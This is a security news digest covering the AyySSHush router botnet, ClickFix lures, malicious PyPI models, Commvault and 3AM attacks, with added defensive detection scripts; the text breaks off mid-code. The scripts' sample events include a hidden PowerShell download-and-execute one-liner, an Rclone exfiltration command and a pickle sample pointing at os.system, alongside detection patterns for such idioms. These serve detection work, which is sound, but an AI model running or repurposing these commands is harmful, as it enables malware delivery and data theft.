@cyberinsider.com
References: cyberinsider.com, securityonline.info
Mozilla has released Firefox 139, fixing a critical vulnerability in the encoder of the libvpx video codec. The flaw is a double free: the same heap allocation is released twice, which corrupts allocator state and, if an attacker can shape the allocations that follow, can be turned into arbitrary code execution. Security experts are urging users to update to the latest Firefox immediately.
The flaw is especially concerning because it needs no interaction beyond ordinary browsing: malicious content could trigger it without the user clicking or downloading anything. Firefox 139 closes that remote code execution path, and the update should be applied with the urgency reserved for critical browser patches; a memory-corruption bug reachable from web content becomes exploitable at scale the moment a working exploit circulates.

Pierluigi Paganini@securityaffairs.com
GreyNoise researchers have uncovered a significant and stealthy campaign exploiting ASUS routers, leading to the formation of a new botnet dubbed "AyySSHush". This long-running operation has compromised thousands of ASUS routers, with numbers steadily increasing. The attackers are gaining unauthorized, persistent access to the devices, effectively establishing a distributed network of backdoors, potentially laying the foundation for a future, larger botnet.
The intrusion chain is multi-step and shows detailed knowledge of ASUS firmware. Initial access comes from brute-forced logins and previously undocumented authentication bypasses. The attackers then use CVE-2023-39780, a command injection flaw, to run system commands: they enable the router's built-in SSH daemon on a custom port and add an attacker-controlled public key to its authorized keys, giving them persistent remote access without dropping any malware on the device. Because that configuration is written to non-volatile memory (NVRAM), it survives reboots and firmware upgrades, and router logging is disabled to frustrate detection. As of late May 2025, more than 9,000 ASUS routers were confirmed compromised. Prompt patching closes the entry point, but a firmware update does not evict an attacker who has already planted a key: the SSH settings stored in NVRAM must be inspected and any unknown key removed, or the device reset to factory defaults.
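One way to check a router for the configuration described above, as an added example rather than GreyNoise's or ASUS's tooling: the script parses the output of `nvram show` (which an administrator can capture from the router's shell) and flags an enabled SSH daemon, a non-standard port, authorized keys that are not on an allow list, and a zeroed syslog level. The NVRAM variable names sshd_enable, sshd_port and sshd_authkeys are those used by ASUSWRT firmware; treating '>' as the separator between stored keys and log_level=0 as "logging off" are assumptions, and the dump, keys and port below are constructed placeholders.

```python
"""Audit ASUSWRT NVRAM for an AyySSHush-style SSH backdoor (added example)."""
import re

# Constructed `nvram show` output. Keys and port are placeholders, not real IOCs.
SAMPLE_NVRAM = """\
wan_ipaddr=203.0.113.10
sshd_enable=1
sshd_port=2222
sshd_pass=0
sshd_authkeys=ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY admin@laptop>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQEXAMPLEATTACKERKEY user@host
log_level=0
"""

# Keys the administrator actually installed (constructed).
ADMIN_KEYS = frozenset({"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY admin@laptop"})


def parse_nvram(dump: str) -> dict:
    """Turn `nvram show` text into a dict; a repeated key keeps its last value."""
    settings = {}
    for line in dump.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def authorized_keys(settings: dict) -> list:
    """Split sshd_authkeys into individual public keys.

    ASUSWRT keeps every key in this one variable. Accepting '>' or a newline
    as the separator is an assumption based on dumps seen in the field.
    """
    raw = settings.get("sshd_authkeys", "")
    return [k.strip() for k in re.split(r"[>\n]", raw) if k.strip()]


def audit_ssh(settings: dict, known_keys=frozenset(), expected_port: str = "22") -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    if settings.get("sshd_enable", "0") != "0":
        findings.append(f"sshd enabled (sshd_enable={settings['sshd_enable']})")
        port = settings.get("sshd_port", "22")
        if port != expected_port:
            findings.append(f"sshd listening on non-standard port {port}")
    # Keys stay in NVRAM even while sshd is off, so always review them.
    for key in authorized_keys(settings):
        if key not in known_keys:
            parts = key.split()
            label = parts[-1] if len(parts) >= 3 else "(no comment)"
            findings.append(f"unknown authorized key: {label}")
    # Assumption: log_level=0 means the syslog daemon records nothing useful.
    if settings.get("log_level") == "0":
        findings.append("log_level=0: syslog effectively disabled")
    return findings


if __name__ == "__main__":
    for finding in audit_ssh(parse_nvram(SAMPLE_NVRAM), known_keys=ADMIN_KEYS):
        print(finding)
```

Run it against a dump taken from the device itself rather than from the web UI, which only shows the settings it knows how to display. Any unknown key is grounds for a factory reset, since the same NVRAM may hold other changes the audit does not enumerate.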

@www.microsoft.com
References: mfesgin.github.io, IACR News
IACR News has highlighted recent advancements in post-quantum cryptography, essential for safeguarding data against future quantum computer attacks. A key area of focus is the development of algorithms and protocols that remain secure even when classical cryptographic methods become vulnerable. Among these efforts, FrodoKEM stands out as a conservative quantum-safe cryptographic algorithm, designed to provide strong security guarantees in the face of quantum computing threats.
The adaptive security of key-unique threshold signatures is also under scrutiny. Work by Elizabeth Crites, Chelsea Komlo and Mary Maller examines which assumptions are needed to prove threshold signatures adaptively secure, that is, secure against an adversary who chooses which signers to corrupt after seeing protocol messages rather than fixing them in advance. They give impossibility results showing how hard adaptive security is to achieve for key-unique threshold schemes, in particular those compatible with standard single-party signatures such as BLS, ECDSA and Schnorr, and use them to guide the search for new assumptions and properties under which adaptively secure schemes can be built. In related news, Muhammed F. Esgin is offering PhD and post-doc positions in post-quantum cryptography at Monash University, seeking candidates with a strong background in mathematics and cryptography; students begin their research from the outset, with competitive stipends and opportunities for teaching-assistant roles.

Puja Srivastava@Sucuri Blog
Cybercriminals are increasingly employing sophisticated social engineering techniques to distribute malware, with a recent surge in attacks leveraging fake CAPTCHA prompts and AI-generated TikTok videos. These campaigns, collectively known as "ClickFix," manipulate users into executing malicious PowerShell commands, leading to system compromise and the installation of information-stealing malware. A notable example involves a fake Google Meet page hosted on compromised WordPress sites, which tricks visitors into copying and pasting a specific PowerShell command under the guise of fixing a "Microphone Permission Denied" error. Once executed, the command downloads a remote access trojan (RAT), granting attackers full control over the victim's system.
ClickFix is also being amplified through AI-generated TikTok videos that promise free access to premium software such as Windows, Microsoft Office, Spotify and CapCut. The videos tell viewers to run a PowerShell command, which instead installs the Vidar and StealC infostealers, capable of harvesting login credentials, payment card data and 2FA codes. Trend Micro researchers note that generative AI lets the operators mass-produce videos and tailor them to different audiences; one clip promising to "boost your Spotify experience instantly" gathered nearly 500,000 views. Defending against ClickFix takes several layers. Disabling the Run dialog through Group Policy, or turning off the Windows+R hotkey, removes the lure's usual execution path. Users should treat unsolicited technical instructions with suspicion, verify where a video comes from, and never paste commands from untrusted sources into a prompt. On the detection side, process-creation events whose command lines contain lure strings such as "not a robot", "captcha", "secure code" or "human" are a strong signal, because the fake verification text is often copied to the clipboard along with the command and lands in the command line. Combined with user awareness, these controls are the main mitigation against ClickFix campaigns.
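A detection that implements the process-creation check above, added here as an example and not taken from the Sucuri or Trend Micro write-ups. It works on records shaped like Sysmon Event ID 1 (ParentImage, Image, CommandLine), flags script hosts whose command line carries the lure text, and separately flags script hosts started from explorer.exe (the parent of anything launched from the Run dialog) that fetch remote content or hide their window. The four events are constructed and the URLs are placeholders.

```python
"""Flag ClickFix-style launches in process-creation telemetry (added example)."""
import re
from pathlib import PureWindowsPath

# Lure strings that ride along with the pasted command (from the write-ups above).
LURE_WORDS = ("not a robot", "captcha", "secure code", "human", "verification id")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download-and-execute or hide-the-window idioms typical of the pasted one-liner.
REMOTE_EXEC = re.compile(
    r"(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|"
    r"frombase64string|-enc(odedcommand)?\b|https?://|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)

# Constructed events modelled on Sysmon Event ID 1 fields; URLs are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://fix.example.invalid/a | iex" '
                    "# I am not a robot - reCAPTCHA Verification ID: 7811"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://meet.example.invalid/fix-microphone"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
]


def classify(event: dict) -> list:
    """Return the reasons an event looks like ClickFix; [] if it does not."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    cmd = event["CommandLine"]
    reasons = []
    if image not in SCRIPT_HOSTS:
        return reasons
    hits = [w for w in LURE_WORDS if w in cmd.lower()]
    if hits:
        reasons.append(f"lure text in command line: {', '.join(hits)}")
    # Run-dialog launches have explorer.exe as parent; pair that with fetch/hide idioms.
    if parent == "explorer.exe" and REMOTE_EXEC.search(cmd):
        reasons.append(f"{image} launched from Explorer/Run dialog with remote fetch or hidden window")
    return reasons


def scan(events) -> list:
    """(index, reasons) for every event that triggers at least one rule."""
    out = []
    for i, event in enumerate(events):
        why = classify(event)
        if why:
            out.append((i, why))
    return out


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], why)
```

The lure-text rule is high confidence on its own; the second rule will also catch administrators who paste download one-liners into Run, so it is better suited to alert enrichment than to blocking.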

@securityonline.info
A critical vulnerability in vBulletin forum software, tracked as CVE-2024-45721, lets unauthenticated attackers execute arbitrary code on unpatched systems, putting millions of online communities at risk of full server compromise. It affects vBulletin 6.0.0 through 6.1.4 and stems from improper sanitization of user input in the template rendering modules. Cybersecurity firm SentinelWatch reported discovering it on May 22, 2025, and exploitation followed quickly, with more than 12,000 attack attempts against forums in various sectors within 48 hours of public disclosure.
Exploitation involves crafting forum posts whose payloads slip past the built-in template sandbox through parameter smuggling. The attackers abuse vBulletin's `vb:rawtemplate` directive, which does not properly validate nested function calls when rendering user-generated content. A successful attack yields SYSTEM-level privileges on Windows hosts and www-data access on Linux, enough to install web shells, credential harvesters and cryptocurrency miners. Proof-of-concept exploits reportedly execute OS commands even on hardened PHP installations, using `unserialize()` with crafted OPcache settings to get around `disable_functions`. vBulletin released version 6.1.5 on May 25, 2025, introducing granular template validation, but at the time of reporting 68% of installations remained unpatched. Observed attack clusters include cryptojacking, data exfiltration and ransomware precursors: 58% of compromised forums carried hidden Monero miners, user databases from 23 gaming communities (some 14 million records) were cloned and are circulating on dark web markets, and six enterprise forums received tailored malware consistent with a prelude to Black Basta ransomware deployment.

Pierluigi Paganini@Security Affairs
The FBI has issued a warning to U.S. law firms regarding an escalating cyber threat posed by the Silent Ransom Group (SRG), also known as Luna Moth or Chatty Spider. This group, active since 2022, has refined its tactics to target law firms specifically since early 2023, likely due to the valuable and confidential client data they possess. The group aims to gain unauthorized access to systems and devices in order to steal sensitive information and extort victims with threats of public data leaks.
SRG relies on IT-themed social engineering calls and callback phishing emails. Posing as internal IT staff, the operators persuade an employee to grant remote access, either by directing them to a malicious website or by emailing a link that installs remote access software. Once inside, they quietly exfiltrate files with WinSCP or with renamed copies of Rclone, leaving few traces and sidestepping controls that look for malware rather than for misuse of legitimate tools. The FBI urges law firms to train staff to recognize these approaches, enforce multi-factor authentication and monitor proactively for unauthorized access, and asks victims to share any ransom communications with law enforcement. CISOs are also advised to harden help desk procedures, improve intrusion detection and tracking, and recognize that paying a ransom is not a viable strategy.
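The "disguised Rclone" detail above is detectable, because renaming a binary does not change the OriginalFileName stored in its PE version resource, which Sysmon and most EDR agents record. The following is an added example, not FBI or vendor code: it compares the on-disk name with OriginalFileName for known exfiltration tools and, independently, recognizes the verb plus remote:path shape of an rclone command line, so a rebuilt binary with a scrubbed resource is still caught when it is actually used. The telemetry records are constructed; paths and remote names are placeholders.

```python
"""Spot renamed Rclone / WinSCP exfiltration tooling in process telemetry (added example)."""
import re
from pathlib import PureWindowsPath

# PE OriginalFileName values of tools abused for exfiltration, and their display names.
EXFIL_ORIGINALS = {"rclone.exe": "rclone", "winscp.exe": "WinSCP"}
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto", "mount", "serve"}
# "<remote>:<path>" with a multi-character remote name, so "C:\..." drive paths do not match.
REMOTE_ARG = re.compile(r"[A-Za-z][\w-]+:[^\s\"']*")

# Constructed records modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
     "OriginalFileName": "rclone.exe", "Description": "Rsync for cloud storage",
     "CommandLine": r'svchost.exe copy "C:\Matters\Client-A" mega-store:cases --transfers 16 -P'},
    {"Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "OriginalFileName": "WinSCP.exe", "Description": "WinSCP: SFTP, FTP, WebDAV and SCP client",
     "CommandLine": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe"'},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe", "Description": "Host Process for Windows Services",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Users\jdoe\Downloads\update.exe",
     "OriginalFileName": "", "Description": "",
     "CommandLine": r"update.exe sync C:\Users\jdoe\Documents gdrive:backup"},
]


def classify(event: dict) -> list:
    """Reasons the process looks like exfiltration tooling; [] if none."""
    on_disk = PureWindowsPath(event["Image"]).name.lower()
    original = (event.get("OriginalFileName") or "").lower()
    reasons = []
    # Rule 1: the version resource says rclone/WinSCP but the file is called something else.
    if original in EXFIL_ORIGINALS and original != on_disk:
        reasons.append(f"{EXFIL_ORIGINALS[original]} renamed to {on_disk}")
    # Rule 2: rclone syntax regardless of binary name or (scrubbed) resource.
    argv = event["CommandLine"].split()
    if (len(argv) >= 3 and argv[1].lower() in RCLONE_VERBS
            and any(REMOTE_ARG.fullmatch(a) for a in argv[2:])):
        reasons.append(f"rclone-style transfer syntax: {' '.join(argv[1:3])}")
    return reasons


def scan(events) -> list:
    """(index, reasons) for every event that triggers at least one rule."""
    out = []
    for i, event in enumerate(events):
        why = classify(event)
        if why:
            out.append((i, why))
    return out


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], why)
```

Both rules are cheap enough to run on every process start. Pair a hit with the parent process: an rclone launched under a remote-support session is exactly the sequence the advisory describes.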

karlo.zanki@reversinglabs.com (Karlo Zanki)@Blog (Main)
References: Blog (Main), www.tripwire.com
Cybersecurity experts are raising alarms over the growing use of artificial intelligence and machine learning artifacts for malicious ends. ReversingLabs (RL) researchers recently uncovered a campaign on the Python Package Index (PyPI) that abuses the Pickle serialization format: threat actors published packages posing as a "Python SDK for interacting with Aliyun AI Labs services" to lure users of Alibaba's AI services. Once installed, a package loads a PyTorch model whose pickled contents are an infostealer, which exfiltrates machine details and the contents of the user's .gitconfig file. Because unpickling executes whatever callables the stream names, a model file is a code execution vector, and this case shows attackers using that property to compromise the software supply chain.
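Because the payload above is carried in a pickle inside a PyTorch model, it is worth seeing how to triage such a file without loading it. The following is an added example, not ReversingLabs' code: `pickletools.genops` walks the opcode stream without executing anything, so the importable names the pickle would resolve (GLOBAL and STACK_GLOBAL opcodes) can be listed and compared against what a model legitimately needs, and a zip-format `.pt` checkpoint is scanned by pulling out its `data.pkl` members. The malicious sample is constructed with a `__reduce__` pointing at `os.system`; serializing it records that reference without calling it, and nothing here ever calls `pickle.load`. The allow list of torch names is a starting point, not a complete one.

```python
"""Static triage of a pickle or PyTorch checkpoint before anyone loads it (added example)."""
import io
import os
import pickle
import pickletools
import zipfile

DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "runpy",
                     "socket", "sys", "shutil", "importlib", "codecs", "webbrowser"}
# Starting allow list of names a plain torch.save() checkpoint refers to (assumption: extend per model).
TORCH_ALLOW = frozenset({("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2"),
                         ("torch", "FloatStorage")})
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "SHORT_BINSTRING", "BINSTRING"}
CALL_OPS = {"REDUCE", "NEWOBJ", "NEWOBJ_EX", "BUILD", "INST", "OBJ"}


class _Stager:
    """Constructed stand-in for a malicious model object; loading it would run os.system."""
    def __reduce__(self):
        return (os.system, ("echo would-run-on-load",))


MALICIOUS_PICKLE = pickle.dumps(_Stager())  # dumps() serialises the reference, it does not run it
BENIGN_PICKLE = pickle.dumps({"weights": [0.1, 0.2], "layers": 2})


def referenced_globals(data: bytes) -> list:
    """(module, name) pairs the pickle would import, found by reading opcodes only.

    GLOBAL/INST carry both names inline. STACK_GLOBAL (protocol 4+) takes them
    from the two most recent strings on the stack, which may come out of the
    memo, so a small memo of string constants is tracked alongside.
    """
    refs, strings, memo = [], [], {}
    last_is_str = False
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in STRING_OPS:
            strings.append(arg)
            last_is_str = True
        elif name == "MEMOIZE":                      # memoises top of stack; stack unchanged
            memo[len(memo)] = strings[-1] if last_is_str else None
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = strings[-1] if last_is_str else None
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            val = memo.get(arg)
            last_is_str = isinstance(val, str)
            if last_is_str:
                strings.append(val)
        elif name in ("GLOBAL", "INST"):
            module, _, attr = arg.partition(" ")
            refs.append((module, attr))
            last_is_str = False
        elif name == "STACK_GLOBAL":
            if len(strings) >= 2:
                refs.append((strings[-2], strings[-1]))
            last_is_str = False
        else:
            last_is_str = False
    return refs


def scan_pickle(data: bytes, allow=frozenset()) -> list:
    """Findings for one pickle stream; [] means only allow-listed imports, if any."""
    findings = []
    for module, name in referenced_globals(data):
        if (module, name) in allow:
            continue
        kind = "dangerous" if module.split(".")[0] in DANGEROUS_MODULES else "unexpected"
        findings.append(f"{kind} import {module}.{name}")
    if findings and any(op.name in CALL_OPS for op, _, _ in pickletools.genops(data)):
        findings.append("pickle invokes a callable (REDUCE/NEWOBJ/BUILD) on load")
    return findings


def build_fake_checkpoint(pkl: bytes) -> bytes:
    """Constructed zip with the member layout of a torch.save() archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("model/data.pkl", pkl)
        zf.writestr("model/version", "3\n")
    return buf.getvalue()


def scan_torch_archive(blob: bytes, allow=frozenset()) -> dict:
    """Scan every *.pkl member of an in-memory zip-format checkpoint."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for member in zf.namelist():
            if member.endswith(".pkl"):
                report[member] = scan_pickle(zf.read(member), allow)
    return report


if __name__ == "__main__":
    print(scan_pickle(BENIGN_PICKLE, TORCH_ALLOW))
    print(scan_torch_archive(build_fake_checkpoint(MALICIOUS_PICKLE), TORCH_ALLOW))
```

Any import outside the allow list is a reason not to load the file at all; for models that must be loaded, prefer a weights-only format such as safetensors, which carries no executable content.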
Ransomware crews are also leaning on social engineering. The 3AM ransomware group has been observed impersonating IT support to talk employees into granting remote access to company networks. The attackers flood an employee's inbox with unsolicited email, then call from a spoofed number claiming to be the organization's IT desk and offering to fix the problem. They talk the victim into launching Microsoft Quick Assist, then use the resulting session to deploy malicious payloads, create new accounts with administrative privileges and exfiltrate large volumes of data. The pattern underlines the need for employee training that covers pressure tactics over the phone as well as phishing links. Separately, the US Department of Justice has charged 16 Russian nationals allegedly tied to the DanaBot malware operation, which infected at least 300,000 machines worldwide. The indictment describes DanaBot being used both for profit-driven crime and for espionage against military, government and NGO targets: a single operation spanning ransomware, cyberattacks in Ukraine and spying, illustrating how blurred the line between cybercrime and state-directed activity has become. The Defense Criminal Investigative Service (DCIS) has seized DanaBot infrastructure around the world.

CISA@All CISA Advisories
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning regarding a potential broader campaign targeting Software-as-a-Service (SaaS) providers. This alert follows the discovery of unauthorized activity within Commvault's Microsoft Azure environment. CISA believes threat actors may have gained access to client secrets for Commvault's Metallic Microsoft 365 (M365) backup SaaS solution hosted in Azure. This access could allow the threat actors to compromise Commvault's customers' M365 environments where application secrets are stored by Commvault.
The suspected campaign exploits default configurations and over-privileged cloud applications, making SaaS providers with weak tenant hygiene prime targets. The initial incident involved a zero-day, CVE-2025-3928, in Commvault's Web Server, which let remote authenticated attackers create and execute web shells. Commvault says Microsoft alerted it to the unauthorized activity in February 2025, prompting an investigation and remediation; it reports no unauthorized access to customer backup data and has rotated the application credentials used for M365 as a precaution. CISA's recommendations for users and administrators include monitoring Entra audit logs for unauthorized changes, reviewing Microsoft sign-in logs for suspicious activity, and applying Conditional Access policies that restrict service principal authentication to approved IP addresses. It also advises reviewing Application Registrations and Service Principals in Entra, restricting access to Commvault management interfaces, and placing a Web Application Firewall in front of them to detect and block path-traversal attempts. Together these steps limit the blast radius when a SaaS provider's own application secrets are exposed.
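CISA's advice to restrict service principal authentication to approved addresses can be tested against history before it is enforced. The script below is an added example, not CISA's or Commvault's tooling: it reads service principal sign-in records exported from Entra ID as JSON (the field names follow that log; the three records, app IDs and addresses are constructed) and reports sign-ins from outside the ranges a Conditional Access policy would allow, as well as sign-ins by principals that have no such policy at all.

```python
"""Find service-principal sign-ins outside an approved address range (added example)."""
import ipaddress
import json

# Constructed policy: the ranges a backup provider's app should authenticate from,
# keyed by the app (client) ID of its service principal.
APPROVED_RANGES = {
    "11111111-2222-3333-4444-555555555555": ["198.51.100.0/24", "2001:db8:10::/48"],
}

# Constructed export shaped like Entra ID service principal sign-in log entries.
SAMPLE_LOG = json.dumps([
    {"createdDateTime": "2025-02-20T02:14:09Z", "appId": "11111111-2222-3333-4444-555555555555",
     "servicePrincipalName": "Backup-M365-Connector", "ipAddress": "198.51.100.17",
     "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-02-20T02:15:41Z", "appId": "11111111-2222-3333-4444-555555555555",
     "servicePrincipalName": "Backup-M365-Connector", "ipAddress": "203.0.113.77",
     "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-02-20T02:16:03Z", "appId": "99999999-8888-7777-6666-555555555555",
     "servicePrincipalName": "Unmanaged-App", "ipAddress": "203.0.113.78",
     "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 7000215}},
])


def ip_in_ranges(ip: str, cidrs) -> bool:
    """True if ip falls in any CIDR; address-family mismatches simply do not match."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c) for c in cidrs)


def audit(log_json: str, approved: dict) -> list:
    """One finding per sign-in that violates, or is not covered by, the approved-range policy."""
    findings = []
    for rec in json.loads(log_json):
        app, ip = rec["appId"], rec["ipAddress"]
        succeeded = rec.get("status", {}).get("errorCode", 0) == 0
        base = {"time": rec["createdDateTime"], "sp": rec["servicePrincipalName"],
                "ip": ip, "succeeded": succeeded}
        if app not in approved:
            findings.append({**base, "reason": "service principal has no approved-range policy"})
        elif not ip_in_ranges(ip, approved[app]):
            findings.append({**base, "reason": "sign-in from outside approved ranges"})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG, APPROVED_RANGES):
        print(finding)
```

Running it over the weeks before a policy goes live shows both what the policy would have blocked and which legitimate automation it would break. Conditional Access for workload identities requires the Microsoft Entra Workload ID Premium licence and applies to single-tenant service principals, so confirm that the app registration in question is in scope before relying on it; a successful sign-in from an unexpected address by a principal that holds application secrets is the case to chase first.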

@securebulletin.com
A new wave of cyberattacks is leveraging sophisticated social engineering techniques combined with technical exploits to breach corporate networks. Security firms are reporting a rise in attacks linked to the 3AM ransomware operation. These attacks begin with an overwhelming flood of emails, known as email bombing, directed at specific employees. This is followed by spoofed phone calls where the attackers impersonate the organization's IT support team, attempting to trick the employee into granting remote access to their computer. The attackers’ use of real phone calls marks a notable escalation in social engineering sophistication.
Once the attackers have the employee's trust, they ask them to start Microsoft Quick Assist, a legitimate remote assistance tool, which hands the caller an interactive session under the guise of fixing the mail problem. That foothold is used to deploy a malicious payload, in some cases a virtual machine or other tooling chosen to stay out of sight of endpoint security, after which the actors install further software, create new user accounts and obtain administrative privileges. Sophos has documented several ransomware actors using this pattern, first reported by Microsoft: email bombing to overwhelm a targeted employee, followed by a voice or video call over Microsoft Teams in which the caller poses as tech support and asks for remote access. BleepingComputer reports that highly targeted intrusions of this kind, attributed to actors linked to the 3AM operation, were launched during the first quarter of this year. With access established, the intruders perform reconnaissance, create local administrator accounts and install remote management tools for persistence and lateral movement, frequently ending in significant data exfiltration.
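The email-bombing stage described above is visible in mail-gateway logs well before the phone call comes, and the signal is not volume alone but volume combined with sender diversity: a monitoring system that sends a hundred alerts from one address is normal, a hundred newsletters from a hundred domains in ten minutes is not. The detector below is an added example, not Sophos or Microsoft tooling; the one-line-per-message log format is a constructed simplification of a gateway's message-tracking log, and the addresses and times are placeholders.

```python
"""Detect an email-bombing burst per recipient from gateway logs (added example)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log: 12 messages from 12 distinct senders to one user in about two
# minutes, plus routine alerts from a single sender to another mailbox.
_BURST_TIMES = ["09:00:01", "09:00:09", "09:00:20", "09:00:31", "09:00:44", "09:01:02",
                "09:01:15", "09:01:27", "09:01:40", "09:01:58", "09:02:04", "09:02:19"]
SAMPLE_LOG = "\n".join(
    [f"2025-05-20T{t}Z accepted rcpt=jdoe@corp.example from=list{i}@news{i}.example"
     for i, t in enumerate(_BURST_TIMES)]
    + [f"2025-05-20T09:0{m}:05Z accepted rcpt=ops@corp.example from=alerts@monitor.example"
       for m in range(3)]
)


def parse(line: str):
    """'<ISO time>Z accepted rcpt=<addr> from=<addr>' -> (datetime, recipient, sender)."""
    ts, _, fields = line.split(" ", 2)
    kv = dict(f.split("=", 1) for f in fields.split())
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), kv["rcpt"].lower(), kv["from"].lower()


def detect_bombing(log_text: str, window=timedelta(minutes=10),
                   min_messages: int = 100, min_senders: int = 30) -> dict:
    """Sliding window per recipient; alert when count AND sender diversity both exceed thresholds.

    Defaults are deliberately high; tune them to the mailbox's baseline.
    """
    events = sorted(parse(l) for l in log_text.splitlines() if l.strip())
    windows = defaultdict(deque)          # recipient -> deque of (timestamp, sender)
    alerts = {}
    for ts, rcpt, sender in events:
        q = windows[rcpt]
        q.append((ts, sender))
        while q and ts - q[0][0] > window:  # drop messages that fell out of the window
            q.popleft()
        senders = {s for _, s in q}
        if rcpt not in alerts and len(q) >= min_messages and len(senders) >= min_senders:
            alerts[rcpt] = {"first_seen": q[0][0], "triggered_at": ts,
                            "messages": len(q), "distinct_senders": len(senders)}
    return alerts


if __name__ == "__main__":
    print(detect_bombing(SAMPLE_LOG, window=timedelta(minutes=5), min_messages=10, min_senders=8))
```

An alert here should go to the help desk as well as the SOC: the next event in this playbook is a call to that user from someone claiming to be the help desk, and the desk is best placed to warn them.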

Andres Ramos@Arctic Wolf
Versa Concerto, a network security and SD-WAN orchestration platform, is facing scrutiny after the public disclosure of multiple unpatched vulnerabilities. ProjectDiscovery researchers revealed technical details on May 21, 2025, following a 90-day responsible disclosure period that began on February 13, 2025. The disclosed flaws include authentication bypasses, remote code execution (RCE), and container escapes, posing a significant threat to the platform and its underlying host systems. The platform is a Spring Boot-based application deployed via Docker containers and routed through Traefik, making it vulnerable to attacks targeting these components.
Chained together, the flaws allow full system compromise. CVE-2025-34027, rated at the maximum severity of 10.0, stems from an inconsistency in how the components handling a request decode its URL; it lets an attacker reach file upload endpoints without authorization and from there achieve remote code execution. CVE-2025-34026 is an authentication bypass that exposes administrative endpoints, and CVE-2025-34025 is a privilege escalation that escapes the Docker container and executes code on the host. Versa Networks says patches were implemented in early March and made generally available in mid-April, that all affected customers were notified through its security and support channels with guidance on applying them, and that it has no indication of exploitation in the wild. ProjectDiscovery, however, reported that no fix had been made available to it when the 90-day deadline expired, which is why it proceeded with public disclosure.

@arstechnica.com
Signal, the privacy-focused messaging application, has taken action to block Microsoft's controversial Recall feature from capturing screenshots of its desktop app content on Windows 11. Citing privacy concerns over Recall's ability to automatically take screenshots of on-screen activity, Signal has implemented a "screen security" setting, enabled by default, that leverages Digital Rights Management (DRM) to prevent the tool from accessing and recording private conversations. This move comes as Signal expresses discontent with Microsoft's approach, arguing that Recall lacks sufficient developer controls to exclude specific apps and protect sensitive information.
Recall, built for Copilot+ PCs, continuously screenshots the desktop and indexes the images into a searchable history of user activity. Signal's concern is that private conversations would be captured and stored alongside everything else. Its fix sets a display-affinity flag on the application window, the same mechanism used to protect DRM-licensed video, which tells Recall and any other screenshot or screen-recording tool to treat the window's contents as off limits. Signal acknowledges that this is a blunt instrument that can interfere with accessibility software such as screen readers, but says Microsoft left it no alternative: there is no developer-facing control for excluding an application from Recall. Signal argues it should not have to rely on "content protection hacks" to protect its users, and asks teams building systems like Recall to weigh the privacy implications up front rather than forcing applications into workarounds that also degrade accessibility.
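The window flag Signal describes is the Win32 display-affinity setting; the example below, which is added here and is not Signal's code, shows the call an application makes and reads the value back to confirm it took effect. WDA_EXCLUDEFROMCAPTURE (Windows 10 version 2004 and later) removes the window from screenshot and screen-recording APIs; WDA_MONITOR is the older DRM-era flag that renders the window as a black box in captures. The call must come from the process that owns the window, so the window handle is assumed to be supplied by the application's own toolkit; on other operating systems the functions return None so the module still imports.

```python
"""Exclude an application window from screen capture via SetWindowDisplayAffinity (added example)."""
import ctypes
import sys

WDA_NONE = 0x00000000
WDA_MONITOR = 0x00000001             # DRM-era flag: black box in captures
WDA_EXCLUDEFROMCAPTURE = 0x00000011  # Windows 10 2004+: window absent from captures


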